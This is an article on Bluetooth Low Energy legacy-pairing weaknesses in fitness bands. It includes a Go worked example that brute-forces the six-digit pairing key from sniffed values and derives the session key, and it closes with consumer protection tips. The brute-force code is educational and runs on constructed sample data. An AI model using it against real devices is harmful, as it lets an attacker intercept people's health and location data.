As we strive to become more health-conscious, fitness bands have exploded on the world market. Millions of individuals strap on a fitness band each day. We monitor, compare and compete with ourselves and a community of like-minded individuals. Data including the number of steps taken daily, calories burned, heart rate and even our sleep patterns are wirelessly transmitted to our smartphones or computers. But is our data secure?

Low Energy Equals Low Security

There are a few security concerns with fitness bands and, for that matter, with any Internet of Things (IoT) device that talks over Bluetooth Low Energy (BLE), the low-power radio introduced with Bluetooth 4.0.

The pairing (key exchange) protocol was designed for BLE's tight energy budget, and it meets that design goal, but the legacy pairing used by Bluetooth 4.0 and 4.1 devices is easy to compromise. The link-layer encryption itself uses AES-CCM, a well-established authenticated-encryption mode; the weakness is in how the keys are agreed. The pairing messages travel in cleartext, and the temporary key (TK) that protects them is either zero ("Just Works" pairing) or a six-digit passkey. An eavesdropper can therefore brute-force the TK from the sniffed pairing traffic, decrypt the session and, if desired, insert themselves as a man-in-the-middle.

There are at most a million candidate TKs, so a laptop-class processor (the original research used a Core i7) can try all of them in well under a second. Once the TK is known, the attacker follows the protocol exactly as the two devices do: with the TK and the random values exchanged in clear it computes the short-term key (STK), decrypts the key-distribution messages protected by the STK and recovers the long-term key (LTK), which protects every later session between the band and the phone. The attack must observe the initial pairing. However, it is also simple to jam an existing connection and force a new pairing (key exchange) to start. Bluetooth 4.2 added LE Secure Connections, which replaces this key exchange with elliptic-curve Diffie-Hellman; devices that still use legacy pairing remain exposed.
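The attack described above, as an added worked example (this code is not from the article or from any vendor's implementation). It implements the Bluetooth Core Specification's legacy-pairing functions c1 (confirm value) and s1 (STK derivation), which are just AES-128 over single blocks, and then recovers the passkey from one sniffed Mconfirm/Mrand pair by trying all one million TKs. Go is used because its standard library ships AES. The pairing parameters and random values are constructed stand-ins, not a real capture, and everything is written in the spec's most-significant-octet-first notation, so a real sniffer would have to reverse the little-endian over-the-air byte order first.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"encoding/binary"
	"encoding/hex"
	"fmt"
)

// PairingParams holds what an eavesdropper sees in clear during BLE legacy
// pairing (Bluetooth 4.0/4.1 Security Manager Protocol). Values are written
// in the spec's most-significant-octet-first notation; a real sniffer must
// reverse the little-endian over-the-air byte order before using them.
type PairingParams struct {
	Preq, Pres [7]byte // Pairing Request / Pairing Response PDU bodies
	Iat, Rat   byte    // initiator / responder address type (0 = public, 1 = random)
	Ia, Ra     [6]byte // initiator / responder device addresses
}

// e is the spec's encryption primitive: AES-128 applied to one 16-byte block.
func e(key, plaintext []byte) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	out := make([]byte, 16)
	block.Encrypt(out, plaintext)
	return out
}

func xor16(a, b []byte) []byte {
	out := make([]byte, 16)
	for i := range out {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// c1 is the confirm value function (Core Spec Vol 3, Part H, 2.2.3):
// c1(k, r) = e(k, e(k, r XOR p1) XOR p2), with
// p1 = pres || preq || rat' || iat' and p2 = 0x00000000 || ia || ra.
func c1(k, r []byte, p PairingParams) []byte {
	p1 := append(append(append([]byte{}, p.Pres[:]...), p.Preq[:]...), p.Rat, p.Iat)
	p2 := append(append([]byte{0, 0, 0, 0}, p.Ia[:]...), p.Ra[:]...)
	return e(k, xor16(e(k, xor16(r, p1)), p2))
}

// s1 is the key generation function (2.2.4): e(k, r1' || r2'), where r1'
// and r2' are the least significant 64 bits of r1 and r2.
func s1(k, r1, r2 []byte) []byte {
	return e(k, append(append([]byte{}, r1[8:]...), r2[8:]...))
}

// tkFromPasskey places a six-digit passkey in the low bits of an otherwise
// zero 128-bit block, which is how legacy pairing forms the TK.
// "Just Works" pairing is the special case passkey = 0.
func tkFromPasskey(passkey uint32) []byte {
	tk := make([]byte, 16)
	binary.BigEndian.PutUint32(tk[12:], passkey)
	return tk
}

// crackTK recovers the passkey from a sniffed Mconfirm/Mrand pair by trying
// every one of the 1,000,000 legal TKs. It returns the passkey, how many
// guesses were needed and whether the search succeeded.
func crackTK(mconfirm, mrand []byte, p PairingParams) (uint32, int, bool) {
	for pk := uint32(0); pk <= 999999; pk++ {
		if bytes.Equal(c1(tkFromPasskey(pk), mrand, p), mconfirm) {
			return pk, int(pk) + 1, true
		}
	}
	return 0, 1000000, false
}

// Constructed stand-ins for a sniffed exchange (not a real capture).
var (
	sampleParams = PairingParams{
		Pres: [7]byte{0x05, 0x00, 0x08, 0x00, 0x00, 0x03, 0x02}, // Pairing Response body, MSO first
		Preq: [7]byte{0x07, 0x07, 0x10, 0x00, 0x00, 0x01, 0x01}, // Pairing Request body, MSO first
		Iat:  0x01, Ia: [6]byte{0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6},
		Rat:  0x00, Ra: [6]byte{0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6},
	}
	sampleMrand = []byte{0x57, 0x83, 0xD5, 0x21, 0x56, 0xAD, 0x6F, 0x0E, 0x63, 0x88, 0x27, 0x4E, 0xC6, 0x70, 0x2E, 0xE0}
	sampleSrand = []byte{0x00, 0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88}
)

// Result is what the attacker ends up holding.
type Result struct {
	Passkey uint32
	Guesses int
	STK     []byte
}

// runExample plays the legitimate initiator (the phone) with the secret
// passkey, then attacks the exchange using only what went over the air.
func runExample(secretPasskey uint32) (Result, bool) {
	// The phone computes Mconfirm from the real TK and sends it in clear.
	mconfirm := c1(tkFromPasskey(secretPasskey), sampleMrand, sampleParams)

	// The eavesdropper brute-forces the TK from Mconfirm and Mrand ...
	pk, guesses, ok := crackTK(mconfirm, sampleMrand, sampleParams)
	if !ok {
		return Result{}, false
	}
	// ... and derives the same STK the devices do: STK = s1(TK, Srand, Mrand).
	// With the STK it can decrypt the key distribution and learn the LTK.
	stk := s1(tkFromPasskey(pk), sampleSrand, sampleMrand)
	return Result{Passkey: pk, Guesses: guesses, STK: stk}, true
}

func main() {
	res, ok := runExample(123456)
	fmt.Printf("recovered=%v passkey=%06d guesses=%d stk=%s\n",
		ok, res.Passkey, res.Guesses, hex.EncodeToString(res.STK))
}
```

The search space is the whole story: a 128-bit key with at most a million possible values is no key at all, and "Just Works" pairing falls on the first guess. The c1 and s1 functions here can be checked against the test vectors in Appendix D of Volume 3, Part H of the Bluetooth Core Specification.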

The range of BLE can be 100 feet or more in open air, so the sniffing device need not be right by your side. That jogger running 50 feet behind you could be intercepting the data transfer from your fitness band to your phone.

A Treasure Trove of Data

Aside from your name and age, an immense amount of personal information is attached to your fitness tracker account. GPS data revealing your home address, current location and daily running route creates real personal-safety risks. If your tracker is linked to your Facebook or Twitter account, even more information about your personal life and preferences becomes available to multiple parties.

This information has proven valuable to companies screening new hires and business partners. Details of your daily calorie intake, diet and regular exercise level could also be extremely valuable to a health or life insurer looking to reprice coverage and limit its losses.

Data has become immensely valuable in shaping the future of health care and many other industries. Companies with vast banks of data are being bought for their knowledge potential. Even unstructured data is becoming more valuable, since technology can analyze it more rapidly and draw correlations that were never before possible. In light of this, health care data currently commands a high price on the Dark Web.

Best Practices for Fitness Bands

How do you protect yourself and your private data?

The simplest thing to do is to turn off Bluetooth on your phone until you are home or in a safe environment. Most fitness bands can store a day or more of fitness data, so sync your band and phone once a day, away from potential threats. Because the attack has to observe the pairing, do the initial pairing, and any re-pairing, at home as well. This keeps your data from being intercepted during unprotected transfers.

One additional benefit: You might experience improved battery life on your phone by only enabling Bluetooth when you actually need it.
